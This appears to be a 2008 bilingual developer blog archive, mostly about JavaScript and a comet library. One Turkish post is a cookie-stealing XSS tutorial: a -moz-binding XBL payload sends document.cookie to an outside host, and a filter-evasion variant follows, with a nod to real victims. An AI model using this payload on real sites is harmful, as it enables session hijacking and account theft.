One step forward two steps back Date: July 10, 2008 Tags: comet , javascript Comments(0)
The newer versions of Opera Browser run functions twice which added as listener to event-source elements.I found this bug when I test new version of pi.comet .You can find the source code as below:event-source.html
<body>
<div id="time"></div>
<script>
var event = document.createElement("event-source");
event.setAttribute("src","event-source.php");
document.body.appendChild(event);
event.addEventListener("azer",function(){
document.getElementById("time").innerHTML += "
"+arguments[0].data;
},false);
</script>
</body>
event-source.php
<?
header("content-type: application/x-dom-event-stream");
while(true){
print "Event: azer\n";
print "data: ".time()."\n\n";
sleep(3);
ob_flush();
flush();
}
?>
Web tabanli Trojan Nasil Yapilir? Date: May 11, 2008 Tags: javascript , security , turkce Comments(0)
XSS ve web guvenligi meraklilari icin birkac teknikten bahsetmeye karar verdim.Bunlardan ilki oldukca gecerli olan ve pek az bilinen, firefox'ta calisan moz-binding yontemi.Yaziyi "vuralim, kiralim" uslubuyla yazdim ancak amacim sadece guvenlik onlemleri icin kaynak olusturmak.Gecen yil Hakan (Bilgin) cloudo icin, bense r(ainbow)92 icin kod renklendirme yapmaya calisiyorduk. Hakan o zamanlar hazirladigi bir ornekte, XBL/-moz-binding teknigini kullanarak uygulamaya CSS kodu icinden XML import ediyor, XML'in icinden de javascript calistiriyordu.Bu bana oldukca ilginc gelmis ve -moz-binding ile tanismami saglamisti.
Eger bu ilginc teknigi, Yahoo UI gelistiricisi Douglas Crockford'un JSON'u kesfetmesini saglayan script include yontemiyle birlestirirseniz (bu yontem hem data transferlerini hem de client'ta istediginiz manyakligi yapmanizi saglar), yapabilecekleriniz hayal gucunuz kadar sinirsizdir. Ornegin maillerine hotmail,gmail vb web uzerinden ulasan bir kullanicinin tum maillerini cekebilir veya habersizce istediginiz maili yazdirtip gondertebilirsiniz.
Her iki yontemin de nasil kullanildigini anlamak icin kullanicilarin cookie'lerini victim list'e kaydetmeyi amacladigimiz kucuk bir ornek yapalim, ornegi denemek icin basit bir uygulama taslagi hazirlayabilirsiniz veya gercek bir kurban secebilirsiniz..
Sectigimiz web uygulamasi kullanicilarin sadece <strong> vb masum gorunen html tag'lerine izin veriyor olsun.Eger bu uygulama attribute'leri kontrol etmiyorsa isimiz kolay, onload vb event'lerle direk javascript calistirabiliriz.Eger kontrol ediyorsa, style attribute'una izin verilip verilmediginden emin olun. WYSIWYG editorlerinden veri bekleyen uygulamalarin hepsinde izin verilir.
Amacimiz style attribute'u icinde -moz-binding kullanarak xbl belgesini cagirmak. Bundan evvel javascript calistiracagimiz XBL belgesini hazirlayip kurbanlarin erisebilecegi bir yere yukleyelim:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
document.body.appendChild(document.createElement("script")).setAttribute("src","http://victim.com/?append="+escape(document.cookie));
</constructor>
</implementation>
</binding>
</bindings>
style='color:red; -moz-binding:url("http://victim.com/xbl.xml#xss");'
Cok az bir ihtimalle kurbaniniz moz-binding yazilmasini veya cross domain veri cagrilmasini blocklamis olabilir. Bu durumda b planimiz "the-spanner.co.uk" adresinde yayinlanan bir snippet'tan geliyor:
/style=\-\mo\z-b\i\nd\in\g:\url(//victim.com\/xbl_log\.xml\#xss)
Bundan sonrasi javascript bilginize kalmis. Kullanicinin arayuzunde daha cesitli tuneller acabilir, arayuzu degistirebilir veya kullanici adina islemler yapabilirsiniz.
PI Comet's stable version released Date: April 9, 2008 Tags: comet , javascript , pi Comments(0)
I fixed base class and reported bugs.You can use pi.comet file or little bigger sized pi library (I'm prepearing a documentation and website for this library).pi.debugger released Date: April 2, 2008 Tags: debugging , javascript Comments(0)
I've developed a cross browser debugging tool that contains some Firebug features.You can try it in here and get more detailed information at pi project's website: http://pi-js.googlecode.comHere is a screenshot:
Pi.Comet works with Turbogears as well Date: April 2, 2008 Tags: cherrypy , comet , javascript , pi , turbogears Comments(2)
After a CherryPy test, I developed a real time chat example with pi.comet&Turbogears.Actually, I was going to add this example long time ago but I couldn't find any shared hostings available. Data streaming can not be used at Webfaction, because webfaction hosts turbogears with cgi support. If you have no hosting problems, you can use pi.comet and turbogears with your comet applications.For now, you can download and test it on your localhost.Download Example:turbogears_realtimeChat.tar.gz
Screenshot:
Microsoft IE8'de Gecko motorunu kullanmaya karar verdi! Date: April 1, 2008 Tags: javascript , misc Comments(0)
Microsoft ilginc bicimde, IE6'dan IE8 beta versiyonuna kadar Javascript yorumlama konusunda bir adim ilerlemedi.IE8 Acid2 testini gecmis olsa bile, asil bekledigimiz W3C Constructor'lar, HTML icin XPATH destegi gibi yeniliklerden haber gelmiyor.Yaklasik 6 yil once piyasaya surdukleri IE'nin bugun kullanildigini, bir yil sonra halen kullanilacagini dusunursek, ki kullanilacagi malum.. Hala nasil pozitif dusunulebilir, nasil IE8'in diger tarayicilarla rekabet edebilecegi hayal edilebilir ? Dogru duzgun Javascript kodlamak icin IE9'un cikmasini, ardindan da son kullanicinin basamak basamak IE9'a gecmesini mi bekleyecegiz? Su durumda bilimsel dusunmekle, karamsar dusunmek arasinda hicbir fark yok..Bu dusunceler arasinda coktandir Microsoft'un humanist bir kararla webkit veya gecko motorunu kullanmaya baslamasini umuyordum ki, bugun rss reader'ima su yazi dustu: Microsoft will use Gecko layout engine in IE 8
Birkac satir okuduktan sonra yuregim pirpir etti resmen :) Ama hatirlarsiniz, bugun o lanet gun 1 nisan :)
"in" Operator in Javascript Date: March 23, 2008 Tags: javascript Comments(0)
Javascript 1.5 contains the in operator that checks only property names.I can't figure out why Javascript returns the exact opposite of that other programming languages return on this operator. Here is an example:
>>> var hello = ["bonjour","hola","saluton","selam"];
>>> "bonjour" in hello
false
>>> 1 in hello
true
Actually, we don't need to the in operator to check values of Array, we can use indexOf property to this action easily;
>>> var hello = ["bonjour","hola","saluton","selam"];
>>> hello.indexOf("bonjour")>-1;
true
>>> hello.indexOf("Hallo")>-1;
false
This operator available to checking object properties too but there are many way to check object properties already;
>>> var hello = { "french":"bonjour", "esperanto":"saluton", "turkish":"selam" };
>>> "turkish" in hello
true
>>> "german" in hello
false
>>> Boolean(hello["turkish"]);
true
>>> Boolean(hello["german"]);
false
The question is, how are object values checked?
gmÇeviri Date: March 22, 2008 Tags: greasemonkey , javascript , misc Comments(4)
gmÇeviri, web sayfalarını gezerken fare imleciyle seçilen ingilizce metinleri türkçeye çevirmek için geliştirdiğim greasemonkey betiğidir.Daha fazla bilgi için yazının devamını okuyun. Continue Readingpi.comet's python module is available Date: March 21, 2008 Tags: cherrypy , comet , django , javascript , pi , python Comments(2)
I coded a python module to get cross browser output and a CherryPy example is available too.You can get these files in downloads list.You can use this module with any python web framework but there are some problems.Firstly, Django doesn't support multi-threading.And there is no shared hosting for CherryPy ( Webfaction runs CherryPy with CGI, sys.stdout.flush function doesn't work on that application ) I hope we have got more comet friendly web frameworks in the future.
Creating Comet Applications In 3 Minutes Date: March 16, 2008 Tags: comet , javascript , pi Comments(10)
First version of my pi library has been released.This version contains a comet class and you can make comet requests in your applications by using it.Tutorial: Getting unix time from server(Sample File, Source)
Firstly, create an html file and import pi.js:
<script type="text/javascript" src="pi.js"></script>
Then, send a request to push.php to get unix time from server:
var request = new pi.comet();
request.environment.setUrl("push.php");
request.event.push = function(RESPONSE){
document.title = "UNIX TIME AT SERVER: "+RESPONSE;
};
request.send();
Finally, create an infinite loop at push.php, import pi.pushData function to this file and print the data which will be updated each time;
require_once "pi.pushData.php";
$type = $_GET["cometType"];
$name = $_GET["cometName"];
while(true){
pushData(time(),$type,$name);
ob_flush();
flush();
sleep(1);
}
That's all! You can get more information at pi.comet's wiki page.
İleri Seviye Javascript Date: March 16, 2008 Tags: javascript Comments(3)
Birkaç ay uğraşarak az bilinen teknikleri içeren 14 sayfalık bir döküman yazdım.İçerik İndeksi:- Fonksiyonlar
- Diziler
- Objeler
- İleri Seviye OOP
